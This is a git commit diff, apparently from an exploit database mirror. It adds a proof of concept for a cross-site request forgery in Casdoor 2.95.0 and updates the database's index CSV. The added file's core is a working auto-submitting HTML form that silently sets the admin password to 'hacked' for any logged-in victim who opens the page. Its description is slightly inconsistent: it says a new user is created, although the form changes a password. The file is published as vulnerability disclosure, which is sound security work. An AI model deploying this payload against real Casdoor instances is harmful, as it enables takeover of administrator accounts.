Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/webapps/52439.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
+# Application: Casdoor
+# Version: v2.95.0 (2025-10-22)
+# Date: 2025-10-23
+# Exploit Author: Van Lam Nguyen
+# Vendor Homepage: https://casdoor.org/
+# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v2.95.0.zip
+# Tested on: Windows
+# CVE : CVE-2023-34927 ( latest yet to be assigned)
+
+Overview
+==================================================
+Casdoor v2.95.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
+This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
+
+Proof of Concept
+==================================================
+
+Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
+
+<html>
+<form action="http://localhost:8000/api/set-password" method="POST">
+    <input name='userOwner' value='built&#45;in' type='hidden'>
+    <input name='userName' value='admin' type='hidden'>
+    <input name='newPassword' value='hacked' type='hidden'>
+    <input type=submit>
+</form>
+<script>
+    history.pushState('', '', '/');
+    document.forms[0].submit();
+</script>
+
+</html>
+
+If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
+
+userOwner: built&#45;in
+userName: admin
+newPassword: hacked

files_exploits.csv

@@ -11058,7 +11058,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2)",1994-02-07,anonymous,remote,multiple,,1994-02-07,2012-08-13,1,CVE-1999-0208;OSVDB-11517,,,,,https://www.securityfocus.com/bid/1749/info
 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,,2018-02-08,2018-02-09,0,CVE-2017-12542,,,,,https://github.com/skelsec/CVE-2017-12542/blob/f9b72fa320af81c93c7a51fef260918d28c27c78/exploit_1.py
 25011,exploits/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow",2004-12-15,"Matthew Dabrowski",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12003/info
-52425,exploits/multiple/remote/52425.py,"HTMLDOC 1.9.13 - Stack Buffer Overflow",2025-09-16,wulfgarpro,remote,multiple,,2025-09-16,2025-09-17,0,CVE-2021-43579,,,,,
+52425,exploits/multiple/remote/52425.py,"HTMLDOC 1.9.13 - Stack Buffer Overflow",2025-09-16,wulfgarpro,remote,multiple,,2025-09-16,2025-10-29,0,CVE-2021-43579,,,,,
 52426,exploits/multiple/remote/52426.py,"HTTP/2 2.0 - Denial Of Service (DOS)",2025-09-16,"Madhusudhan Rajappa",remote,multiple,,2025-09-16,2025-09-16,0,CVE-2023-44487,,,,,
 26966,exploits/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",remote,multiple,,2005-12-22,2013-07-21,1,CVE-2005-4502;OSVDB-21916,,,,,https://www.securityfocus.com/bid/16031/info
 19466,exploits/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",remote,multiple,,1999-08-18,2017-11-15,1,CVE-1999-0753;OSVDB-1049,,,,,https://www.securityfocus.com/bid/591/info
@@ -11885,6 +11885,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
 52432,exploits/multiple/webapps/52432.txt,"Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)",2025-09-16,"Van Lam Nguyen",webapps,multiple,,2025-09-16,2025-09-17,0,CVE-2023-34927,,,,,
+52439,exploits/multiple/webapps/52439.txt,"Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)",2025-10-29,"Van Lam Nguyen",webapps,multiple,,2025-10-29,2025-10-29,0,CVE-2023-34927,,,,,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
 48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,